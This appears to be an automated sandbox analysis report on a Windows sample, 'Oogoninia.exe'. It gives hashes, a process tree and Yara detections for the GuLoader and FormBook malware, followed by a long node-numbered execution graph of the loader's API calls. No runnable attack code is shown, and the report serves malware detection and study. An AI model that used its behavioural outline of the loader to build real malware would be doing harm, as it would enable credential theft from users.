File size: 633'576 bytes
MD5 hash: 18FB2CCCAA9AC71624EACEADA006E938
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1193487825.0000000002E02000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 2
Start time: 15:51:59
Start date: 08/10/2024
Path: C:\Users\user\Desktop\Oogoninia.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\Oogoninia.exe"
Imagebase: 0x400000
File size: 633'576 bytes
MD5 hash: 18FB2CCCAA9AC71624EACEADA006E938
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
                                                                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1365396637.00000000321D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1365396637.00000000321D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:4
                                                                                                                                                                                  Start time:15:52:18
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s
                                                                                                                                                                                  Imagebase:0x140000000
                                                                                                                                                                                  File size:16'696'840 bytes
                                                                                                                                                                                  MD5 hash:731FB4B2E5AFBCADAABB80D642E056AC
                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:9
                                                                                                                                                                                  Start time:15:52:19
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\grpconv.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:"C:\Windows\SysWOW64\grpconv.exe"
                                                                                                                                                                                  Imagebase:0x500000
                                                                                                                                                                                  File size:40'448 bytes
                                                                                                                                                                                  MD5 hash:5A13926732E6D349FD060C072BC7FB74
                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2899878533.0000000004A20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.2899878533.0000000004A20000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2899793805.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.2899793805.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:15
                                                                                                                                                                                  Start time:15:54:52
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\explorer.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                  Imagebase:0x7ff68bab0000
                                                                                                                                                                                  File size:4'849'904 bytes
                                                                                                                                                                                  MD5 hash:5EA66FF5AE5612F921BC9DA23BAC95F7
                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:false


                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                    Execution Coverage:16.9%
                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:14.4%
                                                                                                                                                                                    Signature Coverage:21.5%
                                                                                                                                                                                    Total number of Nodes:1468
                                                                                                                                                                                    Total number of Limit Nodes:37
4532->4530 4533 10001c07 4532->4533 4534 10001224 2 API calls 4532->4534 4603 10001215 GlobalAlloc 4532->4603 4533->4532 4598 10001534 GlobalSize GlobalAlloc 4533->4598 4534->4532 4536->4521 4543 10002212 4537->4543 4539 10002349 GlobalFree 4540 10001712 4539->4540 4539->4543 4540->4476 4540->4477 4540->4489 4541 100022b9 GlobalAlloc MultiByteToWideChar 4545 10002303 4541->4545 4546 100022e3 GlobalAlloc CLSIDFromString GlobalFree 4541->4546 4542 1000230a lstrlenA 4542->4539 4542->4545 4543->4539 4543->4541 4543->4542 4544 10001224 GlobalAlloc lstrcpynA 4543->4544 4607 100012ad 4543->4607 4544->4543 4545->4539 4611 1000251d 4545->4611 4546->4539 4550 100027fa 4548->4550 4549 1000289f VirtualAllocEx 4551 100028bd 4549->4551 4550->4549 4552 100029b9 4551->4552 4553 100029ae GetLastError 4551->4553 4552->4489 4553->4552 4555 100021c0 4554->4555 4556 1000170b 4554->4556 4555->4556 4557 100021d2 GlobalAlloc 4555->4557 4556->4469 4557->4555 4562 100025a5 4558->4562 4559 100025f6 GlobalAlloc 4563 10002618 4559->4563 4560 10002609 4561 1000260e GlobalSize 4560->4561 4560->4563 4561->4563 4562->4559 4562->4560 4563->4494 4565 10002aae 4564->4565 4566 10002aee GlobalFree 4565->4566 4614 10001215 GlobalAlloc 4567->4614 4569 1000243a lstrcpynA 4575 100023e6 4569->4575 4570 1000244b StringFromGUID2 WideCharToMultiByte 4570->4575 4571 1000246f WideCharToMultiByte 4571->4575 4572 10002490 wsprintfA 4572->4575 4573 100024b4 GlobalFree 4573->4575 4574 100024ee GlobalFree 4574->4482 4575->4569 4575->4570 4575->4571 4575->4572 4575->4573 4575->4574 4576 10001266 2 API calls 4575->4576 4615 100012d1 4575->4615 4576->4575 4619 10001215 GlobalAlloc 4578->4619 4580 1000155f 4582 10001586 4580->4582 4583 1000156c lstrcpyA 4580->4583 4584 100015a0 4582->4584 4585 1000158b wsprintfA 4582->4585 4583->4584 4586 10001266 4584->4586 4585->4584 4587 100012a8 GlobalFree 4586->4587 4588 1000126f GlobalAlloc lstrcpynA 4586->4588 4587->4492 4588->4587 4590 100017c5 4589->4590 4591 100023ae 4589->4591 
4590->4502 4590->4503 4591->4590 4592 100023c7 GlobalFree 4591->4592 4592->4591 4594 10001266 2 API calls 4593->4594 4595 10001503 4594->4595 4595->4496 4596->4507 4597->4532 4599 10001552 4598->4599 4599->4533 4606 10001215 GlobalAlloc 4600->4606 4602 10001233 lstrcpynA 4602->4525 4603->4532 4604->4526 4605->4531 4606->4602 4608 100012b4 4607->4608 4609 10001224 2 API calls 4608->4609 4610 100012cf 4609->4610 4610->4543 4612 10002581 4611->4612 4613 1000252b VirtualAlloc 4611->4613 4612->4545 4613->4612 4614->4575 4616 100012f9 4615->4616 4617 100012da 4615->4617 4616->4575 4617->4616 4618 100012e0 lstrcpyA 4617->4618 4618->4616 4619->4580 3753 403180 SetErrorMode GetVersion 3754 4031b7 3753->3754 3755 4031bd 3753->3755 3756 406139 5 API calls 3754->3756 3841 4060cb GetSystemDirectoryA 3755->3841 3756->3755 3758 4031d3 lstrlenA 3758->3755 3759 4031e2 3758->3759 3844 406139 GetModuleHandleA 3759->3844 3762 406139 5 API calls 3763 4031f1 #17 OleInitialize SHGetFileInfoA 3762->3763 3850 405da0 lstrcpynA 3763->3850 3765 40322e GetCommandLineA 3851 405da0 lstrcpynA 3765->3851 3767 403240 GetModuleHandleA 3768 403257 3767->3768 3852 40583d 3768->3852 3771 403345 3772 403358 GetTempPathA 3771->3772 3856 40314f 3772->3856 3774 403370 3775 403374 GetWindowsDirectoryA lstrcatA 3774->3775 3776 4033ca DeleteFileA 3774->3776 3778 40314f 12 API calls 3775->3778 3866 402cfa GetTickCount GetModuleFileNameA 3776->3866 3777 40583d CharNextA 3779 40327b 3777->3779 3781 403390 3778->3781 3779->3771 3779->3777 3782 403347 3779->3782 3781->3776 3784 403394 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 3781->3784 3951 405da0 lstrcpynA 3782->3951 3783 4033de 3790 40583d CharNextA 3783->3790 3823 403464 3783->3823 3836 403474 3783->3836 3786 40314f 12 API calls 3784->3786 3788 4033c2 3786->3788 3788->3776 3788->3836 3792 4033f9 3790->3792 3800 4034a4 3792->3800 3801 40343f 3792->3801 3793 4035ac 3796 4035b4 GetCurrentProcess OpenProcessToken 3793->3796 3797 40362e 
ExitProcess 3793->3797 3794 40348e 3975 405596 3794->3975 3802 4035ff 3796->3802 3803 4035cf LookupPrivilegeValueA AdjustTokenPrivileges 3796->3803 3979 405519 3800->3979 3952 405900 3801->3952 3806 406139 5 API calls 3802->3806 3803->3802 3809 403606 3806->3809 3812 40361b ExitWindowsEx 3809->3812 3815 403627 3809->3815 3810 4034c5 lstrcatA lstrcmpiA 3814 4034e1 3810->3814 3810->3836 3811 4034ba lstrcatA 3811->3810 3812->3797 3812->3815 3817 4034e6 3814->3817 3818 4034ed 3814->3818 4017 40140b 3815->4017 3816 403459 3967 405da0 lstrcpynA 3816->3967 3982 40547f CreateDirectoryA 3817->3982 3987 4054fc CreateDirectoryA 3818->3987 3894 403720 3823->3894 3825 4034f2 SetCurrentDirectoryA 3826 403501 3825->3826 3827 40350c 3825->3827 3990 405da0 lstrcpynA 3826->3990 3991 405da0 lstrcpynA 3827->3991 3832 403558 CopyFileA 3838 40351a 3832->3838 3833 4035a0 3834 405c5b 38 API calls 3833->3834 3834->3836 3968 403646 3836->3968 3837 405dc2 18 API calls 3837->3838 3838->3833 3838->3837 3840 40358c CloseHandle 3838->3840 3992 405dc2 3838->3992 4010 405c5b MoveFileExA 3838->4010 4014 405531 CreateProcessA 3838->4014 3840->3838 3843 4060ed wsprintfA LoadLibraryExA 3841->3843 3843->3758 3845 406155 3844->3845 3846 40615f GetProcAddress 3844->3846 3847 4060cb 3 API calls 3845->3847 3848 4031ea 3846->3848 3849 40615b 3847->3849 3848->3762 3849->3846 3849->3848 3850->3765 3851->3767 3853 405843 3852->3853 3854 40326b CharNextA 3853->3854 3855 405849 CharNextA 3853->3855 3854->3779 3855->3853 4020 40600b 3856->4020 3858 403165 3858->3774 3859 40315b 3859->3858 4029 405812 lstrlenA CharPrevA 3859->4029 3862 4054fc 2 API calls 3863 403173 3862->3863 4032 405a42 3863->4032 4036 405a13 GetFileAttributesA CreateFileA 3866->4036 3868 402d3a 3869 402d4a 3868->3869 4037 405da0 lstrcpynA 3868->4037 3869->3783 3871 402d60 4038 405859 lstrlenA 3871->4038 3875 402d71 GetFileSize 3876 402d88 3875->3876 3891 402e6d 3875->3891 3876->3869 3881 402ed9 3876->3881 3889 402c96 6 API calls 3876->3889 
3876->3891 4075 403122 3876->4075 3878 402e76 3878->3869 3880 402ea6 GlobalAlloc 3878->3880 4078 403138 SetFilePointer 3878->4078 4054 403138 SetFilePointer 3880->4054 3885 402c96 6 API calls 3881->3885 3884 402ec1 4055 402f33 3884->4055 3885->3869 3886 402e8f 3888 403122 ReadFile 3886->3888 3890 402e9a 3888->3890 3889->3876 3890->3869 3890->3880 4043 402c96 3891->4043 3892 402ecd 3892->3869 3892->3892 3893 402f0a SetFilePointer 3892->3893 3893->3869 3895 406139 5 API calls 3894->3895 3896 403734 3895->3896 3897 40373a 3896->3897 3898 40374c 3896->3898 4108 405cfe wsprintfA 3897->4108 4109 405c87 RegOpenKeyExA 3898->4109 3901 403795 lstrcatA 3904 40374a 3901->3904 3903 405c87 3 API calls 3903->3901 4099 4039e5 3904->4099 3907 405900 18 API calls 3908 4037c7 3907->3908 3909 403850 3908->3909 3911 405c87 3 API calls 3908->3911 3910 405900 18 API calls 3909->3910 3912 403856 3910->3912 3913 4037f3 3911->3913 3914 403866 LoadImageA 3912->3914 3915 405dc2 18 API calls 3912->3915 3913->3909 3920 40380f lstrlenA 3913->3920 3921 40583d CharNextA 3913->3921 3916 40390c 3914->3916 3917 40388d RegisterClassA 3914->3917 3915->3914 3919 40140b 2 API calls 3916->3919 3918 4038c3 SystemParametersInfoA CreateWindowExA 3917->3918 3950 403916 3917->3950 3918->3916 3924 403912 3919->3924 3922 403843 3920->3922 3923 40381d lstrcmpiA 3920->3923 3925 40380d 3921->3925 3927 405812 3 API calls 3922->3927 3923->3922 3926 40382d GetFileAttributesA 3923->3926 3929 4039e5 19 API calls 3924->3929 3924->3950 3925->3920 3928 403839 3926->3928 3930 403849 3927->3930 3928->3922 3931 405859 2 API calls 3928->3931 3932 403923 3929->3932 4114 405da0 lstrcpynA 3930->4114 3931->3922 3934 4039b2 3932->3934 3935 40392f ShowWindow 3932->3935 4115 40508b OleInitialize 3934->4115 3937 4060cb 3 API calls 3935->3937 3939 403947 3937->3939 3938 4039b8 3940 4039d4 3938->3940 3941 4039bc 3938->3941 3942 403955 GetClassInfoA 3939->3942 3946 4060cb 3 API calls 3939->3946 3945 40140b 2 API calls 3940->3945 3948 
40140b 2 API calls 3941->3948 3941->3950 3943 403969 GetClassInfoA RegisterClassA 3942->3943 3944 40397f DialogBoxParamA 3942->3944 3943->3944 3947 40140b 2 API calls 3944->3947 3945->3950 3946->3942 3949 4039a7 3947->3949 3948->3950 3949->3950 3950->3836 3951->3772 4130 405da0 lstrcpynA 3952->4130 3954 405911 4131 4058ab CharNextA CharNextA 3954->4131 3957 40344a 3957->3836 3966 405da0 lstrcpynA 3957->3966 3958 40600b 5 API calls 3964 405927 3958->3964 3959 405952 lstrlenA 3960 40595d 3959->3960 3959->3964 3961 405812 3 API calls 3960->3961 3963 405962 GetFileAttributesA 3961->3963 3963->3957 3964->3957 3964->3959 3965 405859 2 API calls 3964->3965 4137 4060a4 FindFirstFileA 3964->4137 3965->3959 3966->3816 3967->3823 3969 403650 CloseHandle 3968->3969 3970 40365e 3968->3970 3969->3970 4140 40368b 3970->4140 3976 4055ab 3975->3976 3977 40349c ExitProcess 3976->3977 3978 4055bf MessageBoxIndirectA 3976->3978 3978->3977 3980 406139 5 API calls 3979->3980 3981 4034a9 lstrcatA 3980->3981 3981->3810 3981->3811 3983 4054d0 GetLastError 3982->3983 3984 4034eb 3982->3984 3983->3984 3985 4054df SetFileSecurityA 3983->3985 3984->3825 3985->3984 3986 4054f5 GetLastError 3985->3986 3986->3984 3988 405510 GetLastError 3987->3988 3989 40550c 3987->3989 3988->3989 3989->3825 3990->3827 3991->3838 3993 405dcf 3992->3993 3994 405ff2 3993->3994 3997 405e70 GetVersion 3993->3997 3998 405fc9 lstrlenA 3993->3998 4001 405dc2 10 API calls 3993->4001 4002 405ee8 GetSystemDirectoryA 3993->4002 4003 405c87 3 API calls 3993->4003 4004 405efb GetWindowsDirectoryA 3993->4004 4005 40600b 5 API calls 3993->4005 4006 405f2f SHGetSpecialFolderLocation 3993->4006 4007 405dc2 10 API calls 3993->4007 4008 405f72 lstrcatA 3993->4008 4197 405cfe wsprintfA 3993->4197 4198 405da0 lstrcpynA 3993->4198 3995 40354b DeleteFileA 3994->3995 4199 405da0 lstrcpynA 3994->4199 3995->3832 3995->3838 3997->3993 3998->3993 4001->3998 4002->3993 4003->3993 4004->3993 4005->3993 4006->3993 4009 405f47 
SHGetPathFromIDListA CoTaskMemFree 4006->4009 4007->3993 4008->3993 4009->3993 4011 405c7c 4010->4011 4012 405c6f 4010->4012 4011->3838 4200 405ae9 lstrcpyA 4012->4200 4015 405570 4014->4015 4016 405564 CloseHandle 4014->4016 4015->3838 4016->4015 4018 401389 2 API calls 4017->4018 4019 401420 4018->4019 4019->3797 4026 406017 4020->4026 4021 406083 CharPrevA 4022 40607f 4021->4022 4022->4021 4025 40609e 4022->4025 4023 406074 CharNextA 4023->4022 4023->4026 4024 40583d CharNextA 4024->4026 4025->3859 4026->4022 4026->4023 4026->4024 4027 406062 CharNextA 4026->4027 4028 40606f CharNextA 4026->4028 4027->4026 4028->4023 4030 40316d 4029->4030 4031 40582c lstrcatA 4029->4031 4030->3862 4031->4030 4033 405a4d GetTickCount GetTempFileNameA 4032->4033 4034 40317e 4033->4034 4035 405a7a 4033->4035 4034->3774 4035->4033 4035->4034 4036->3868 4037->3871 4039 405866 4038->4039 4040 402d66 4039->4040 4041 40586b CharPrevA 4039->4041 4042 405da0 lstrcpynA 4040->4042 4041->4039 4041->4040 4042->3875 4044 402cb7 4043->4044 4045 402c9f 4043->4045 4048 402cc7 GetTickCount 4044->4048 4049 402cbf 4044->4049 4046 402ca8 DestroyWindow 4045->4046 4047 402caf 4045->4047 4046->4047 4047->3878 4051 402cd5 CreateDialogParamA ShowWindow 4048->4051 4052 402cf8 4048->4052 4079 406175 4049->4079 4051->4052 4052->3878 4054->3884 4056 402f49 4055->4056 4057 402f77 4056->4057 4085 403138 SetFilePointer 4056->4085 4059 403122 ReadFile 4057->4059 4060 402f82 4059->4060 4061 402f94 GetTickCount 4060->4061 4062 4030bb 4060->4062 4064 4030a5 4060->4064 4061->4064 4071 402fc0 4061->4071 4063 4030fd 4062->4063 4068 4030bf 4062->4068 4066 403122 ReadFile 4063->4066 4064->3892 4065 403122 ReadFile 4065->4071 4066->4064 4067 403122 ReadFile 4067->4068 4068->4064 4068->4067 4069 405aba WriteFile 4068->4069 4069->4068 4070 403016 GetTickCount 4070->4071 4071->4064 4071->4065 4071->4070 4072 40303b MulDiv wsprintfA 4071->4072 4083 405aba WriteFile 4071->4083 4086 404fb9 4072->4086 4097 405a8b ReadFile 
4075->4097 4078->3886 4080 406192 PeekMessageA 4079->4080 4081 402cc5 4080->4081 4082 406188 DispatchMessageA 4080->4082 4081->3878 4082->4080 4084 405ad8 4083->4084 4084->4071 4085->4057 4087 404fd4 4086->4087 4096 405077 4086->4096 4088 404ff1 lstrlenA 4087->4088 4089 405dc2 18 API calls 4087->4089 4090 40501a 4088->4090 4091 404fff lstrlenA 4088->4091 4089->4088 4093 405020 SetWindowTextA 4090->4093 4094 40502d 4090->4094 4092 405011 lstrcatA 4091->4092 4091->4096 4092->4090 4093->4094 4095 405033 SendMessageA SendMessageA SendMessageA 4094->4095 4094->4096 4095->4096 4096->4071 4098 403135 4097->4098 4098->3876 4100 4039f9 4099->4100 4122 405cfe wsprintfA 4100->4122 4102 403a6a 4103 405dc2 18 API calls 4102->4103 4104 403a76 SetWindowTextA 4103->4104 4105 403a92 4104->4105 4106 4037a5 4104->4106 4105->4106 4107 405dc2 18 API calls 4105->4107 4106->3907 4107->4105 4108->3904 4110 403777 4109->4110 4111 405cba RegQueryValueExA 4109->4111 4110->3901 4110->3903 4112 405cdb RegCloseKey 4111->4112 4112->4110 4114->3909 4123 403fd1 4115->4123 4117 4050ae 4121 4050d5 4117->4121 4126 401389 4117->4126 4118 403fd1 SendMessageA 4119 4050e7 OleUninitialize 4118->4119 4119->3938 4121->4118 4122->4102 4124 403fe9 4123->4124 4125 403fda SendMessageA 4123->4125 4124->4117 4125->4124 4128 401390 4126->4128 4127 4013fe 4127->4117 4128->4127 4129 4013cb MulDiv SendMessageA 4128->4129 4129->4128 4130->3954 4132 4058d6 4131->4132 4133 4058c6 4131->4133 4135 40583d CharNextA 4132->4135 4136 4058f6 4132->4136 4133->4132 4134 4058d1 CharNextA 4133->4134 4134->4136 4135->4132 4136->3957 4136->3958 4138 4060c5 4137->4138 4139 4060ba FindClose 4137->4139 4138->3964 4139->4138 4142 403699 4140->4142 4141 403663 4144 405642 4141->4144 4142->4141 4143 40369e FreeLibrary GlobalFree 4142->4143 4143->4141 4143->4143 4145 405900 18 API calls 4144->4145 4146 405662 4145->4146 4147 405681 4146->4147 4148 40566a DeleteFileA 4146->4148 4150 4057b9 4147->4150 4184 405da0 lstrcpynA 4147->4184 4149 
40347d OleUninitialize 4148->4149 4149->3793 4149->3794 4150->4149 4155 4060a4 2 API calls 4150->4155 4152 4056a7 4153 4056ba 4152->4153 4154 4056ad lstrcatA 4152->4154 4157 405859 2 API calls 4153->4157 4156 4056c0 4154->4156 4158 4057d3 4155->4158 4159 4056ce lstrcatA 4156->4159 4161 4056d9 lstrlenA FindFirstFileA 4156->4161 4157->4156 4158->4149 4160 4057d7 4158->4160 4159->4161 4162 405812 3 API calls 4160->4162 4163 4057af 4161->4163 4182 4056fd 4161->4182 4164 4057dd 4162->4164 4163->4150 4166 4055fa 5 API calls 4164->4166 4165 40583d CharNextA 4165->4182 4167 4057e9 4166->4167 4168 405803 4167->4168 4169 4057ed 4167->4169 4172 404fb9 25 API calls 4168->4172 4169->4149 4174 404fb9 25 API calls 4169->4174 4170 40578e FindNextFileA 4173 4057a6 FindClose 4170->4173 4170->4182 4172->4149 4173->4163 4175 4057fa 4174->4175 4176 405c5b 38 API calls 4175->4176 4179 405801 4176->4179 4178 405642 62 API calls 4178->4182 4179->4149 4180 404fb9 25 API calls 4180->4170 4181 404fb9 25 API calls 4181->4182 4182->4165 4182->4170 4182->4178 4182->4180 4182->4181 4183 405c5b 38 API calls 4182->4183 4185 405da0 lstrcpynA 4182->4185 4186 4055fa 4182->4186 4183->4182 4184->4152 4185->4182 4194 4059ee GetFileAttributesA 4186->4194 4189 405615 RemoveDirectoryA 4191 405623 4189->4191 4190 40561d DeleteFileA 4190->4191 4192 405627 4191->4192 4193 405633 SetFileAttributesA 4191->4193 4192->4182 4193->4192 4195 405a00 SetFileAttributesA 4194->4195 4196 405606 4194->4196 4195->4196 4196->4189 4196->4190 4196->4192 4197->3993 4198->3993 4199->3995 4201 405b11 4200->4201 4202 405b37 GetShortPathNameA 4200->4202 4227 405a13 GetFileAttributesA CreateFileA 4201->4227 4203 405c56 4202->4203 4204 405b4c 4202->4204 4203->4011 4204->4203 4206 405b54 wsprintfA 4204->4206 4208 405dc2 18 API calls 4206->4208 4207 405b1b CloseHandle GetShortPathNameA 4207->4203 4209 405b2f 4207->4209 4210 405b7c 4208->4210 4209->4202 4209->4203 4228 405a13 GetFileAttributesA CreateFileA 4210->4228 4212 405b89 
4212->4203 4213 405b98 GetFileSize GlobalAlloc 4212->4213 4214 405bba 4213->4214 4215 405c4f CloseHandle 4213->4215 4216 405a8b ReadFile 4214->4216 4215->4203 4217 405bc2 4216->4217 4217->4215 4229 405978 lstrlenA 4217->4229 4220 405bd9 lstrcpyA 4223 405bfb 4220->4223 4221 405bed 4222 405978 4 API calls 4221->4222 4222->4223 4224 405c32 SetFilePointer 4223->4224 4225 405aba WriteFile 4224->4225 4226 405c48 GlobalFree 4225->4226 4226->4215 4227->4207 4228->4212 4230 4059b9 lstrlenA 4229->4230 4231 405992 lstrcmpiA 4230->4231 4233 4059c1 4230->4233 4232 4059b0 CharNextA 4231->4232 4231->4233 4232->4230 4233->4220 4233->4221 5083 401000 5084 401037 BeginPaint GetClientRect 5083->5084 5085 40100c DefWindowProcA 5083->5085 5087 4010f3 5084->5087 5088 401179 5085->5088 5089 401073 CreateBrushIndirect FillRect DeleteObject 5087->5089 5090 4010fc 5087->5090 5089->5087 5091 401102 CreateFontIndirectA 5090->5091 5092 401167 EndPaint 5090->5092 5091->5092 5093 401112 6 API calls 5091->5093 5092->5088 5093->5092 5094 401900 5095 402ace 18 API calls 5094->5095 5096 401907 5095->5096 5097 405596 MessageBoxIndirectA 5096->5097 5098 401910 5097->5098 5099 401502 5100 40150a 5099->5100 5102 40151d 5099->5102 5101 402aac 18 API calls 5100->5101 5101->5102 4234 402483 4245 402bd8 4234->4245 4236 40248d 4249 402ace 4236->4249 4239 4024a0 RegQueryValueExA 4241 4024c0 4239->4241 4242 4024c6 RegCloseKey 4239->4242 4240 402729 4241->4242 4255 405cfe wsprintfA 4241->4255 4242->4240 4246 402ace 18 API calls 4245->4246 4247 402bf1 4246->4247 4248 402bff RegOpenKeyExA 4247->4248 4248->4236 4250 402ada 4249->4250 4251 405dc2 18 API calls 4250->4251 4252 402afb 4251->4252 4253 402496 4252->4253 4254 40600b 5 API calls 4252->4254 4253->4239 4253->4240 4254->4253 4255->4242 5103 100029c3 5104 100029db 5103->5104 5105 10001534 2 API calls 5104->5105 5106 100029f6 5105->5106 5107 401c04 5108 402aac 18 API calls 5107->5108 5109 401c0b 5108->5109 5110 402aac 18 API calls 5109->5110 5111 401c18 
5110->5111 5112 401c2d 5111->5112 5113 402ace 18 API calls 5111->5113 5114 401c3d 5112->5114 5115 402ace 18 API calls 5112->5115 5113->5112 5116 401c94 5114->5116 5117 401c48 5114->5117 5115->5114 5119 402ace 18 API calls 5116->5119 5118 402aac 18 API calls 5117->5118 5120 401c4d 5118->5120 5121 401c99 5119->5121 5122 402aac 18 API calls 5120->5122 5123 402ace 18 API calls 5121->5123 5124 401c59 5122->5124 5125 401ca2 FindWindowExA 5123->5125 5126 401c84 SendMessageA 5124->5126 5127 401c66 SendMessageTimeoutA 5124->5127 5128 401cc0 5125->5128 5126->5128 5127->5128 4262 401389 4264 401390 4262->4264 4263 4013fe 4264->4263 4265 4013cb MulDiv SendMessageA 4264->4265 4265->4264 5129 40270b 5130 402ace 18 API calls 5129->5130 5131 402712 FindFirstFileA 5130->5131 5132 402735 5131->5132 5136 402725 5131->5136 5133 40273c 5132->5133 5137 405cfe wsprintfA 5132->5137 5138 405da0 lstrcpynA 5133->5138 5137->5133 5138->5136 5139 401490 5140 404fb9 25 API calls 5139->5140 5141 401497 5140->5141 5142 402590 5143 402595 5142->5143 5144 4025a9 5142->5144 5145 402aac 18 API calls 5143->5145 5146 402ace 18 API calls 5144->5146 5148 40259e 5145->5148 5147 4025b0 lstrlenA 5146->5147 5147->5148 5149 405aba WriteFile 5148->5149 5150 4025d2 5148->5150 5149->5150 5151 402c13 5152 402c22 SetTimer 5151->5152 5154 402c3b 5151->5154 5152->5154 5153 402c90 5154->5153 5155 402c55 MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 5154->5155 5155->5153 5156 404714 5157 404740 5156->5157 5158 404724 5156->5158 5160 404773 5157->5160 5161 404746 SHGetPathFromIDListA 5157->5161 5167 40557a GetDlgItemTextA 5158->5167 5163 404756 5161->5163 5166 40475d SendMessageA 5161->5166 5162 404731 SendMessageA 5162->5157 5164 40140b 2 API calls 5163->5164 5164->5166 5166->5160 5167->5162 4305 401d95 GetDC 4306 402aac 18 API calls 4305->4306 4307 401da7 GetDeviceCaps MulDiv ReleaseDC 4306->4307 4308 402aac 18 API calls 4307->4308 4309 401dd8 4308->4309 4310 405dc2 18 API calls 4309->4310 4311 401e15 
CreateFontIndirectA 4310->4311 4312 40258a 4311->4312 4313 402695 4314 40269c 4313->4314 4316 40290b 4313->4316 4315 402aac 18 API calls 4314->4315 4317 4026a3 4315->4317 4318 4026b2 SetFilePointer 4317->4318 4318->4316 4319 4026c2 4318->4319 4321 405cfe wsprintfA 4319->4321 4321->4316 5168 10001058 5170 10001074 5168->5170 5169 100010dc 5170->5169 5171 10001091 5170->5171 5172 100014bb GlobalFree 5170->5172 5173 100014bb GlobalFree 5171->5173 5172->5171 5174 100010a1 5173->5174 5175 100010b1 5174->5175 5176 100010a8 GlobalSize 5174->5176 5177 100010b5 GlobalAlloc 5175->5177 5178 100010c6 5175->5178 5176->5175 5179 100014e2 3 API calls 5177->5179 5180 100010d1 GlobalFree 5178->5180 5179->5178 5180->5169 5181 404099 lstrcpynA lstrlenA 5182 401d1a 5183 402aac 18 API calls 5182->5183 5184 401d28 SetWindowLongA 5183->5184 5185 40295e 5184->5185 4432 40159d 4433 402ace 18 API calls 4432->4433 4434 4015a4 SetFileAttributesA 4433->4434 4435 4015b6 4434->4435 5191 40149d 5192 4014ab PostQuitMessage 5191->5192 5193 4022dd 5191->5193 5192->5193 4436 401a1e 4437 402ace 18 API calls 4436->4437 4438 401a27 ExpandEnvironmentStringsA 4437->4438 4439 401a3b 4438->4439 4441 401a4e 4438->4441 4440 401a40 lstrcmpA 4439->4440 4439->4441 4440->4441 4620 40171f 4621 402ace 18 API calls 4620->4621 4622 401726 SearchPathA 4621->4622 4623 401741 4622->4623 5194 100010e0 5203 1000110e 5194->5203 5195 100011c4 GlobalFree 5196 100012ad 2 API calls 5196->5203 5197 100011c3 5197->5195 5198 10001266 2 API calls 5201 100011b1 GlobalFree 5198->5201 5199 10001155 GlobalAlloc 5199->5203 5200 100011ea GlobalFree 5200->5203 5201->5203 5202 100012d1 lstrcpyA 5202->5203 5203->5195 5203->5196 5203->5197 5203->5198 5203->5199 5203->5200 5203->5201 5203->5202 5204 10002162 5205 100021c0 5204->5205 5206 100021f6 5204->5206 5205->5206 5207 100021d2 GlobalAlloc 5205->5207 5207->5205 5208 401e25 5209 402aac 18 API calls 5208->5209 5210 401e2b 5209->5210 5211 402aac 18 API calls 5210->5211 5212 401e37 
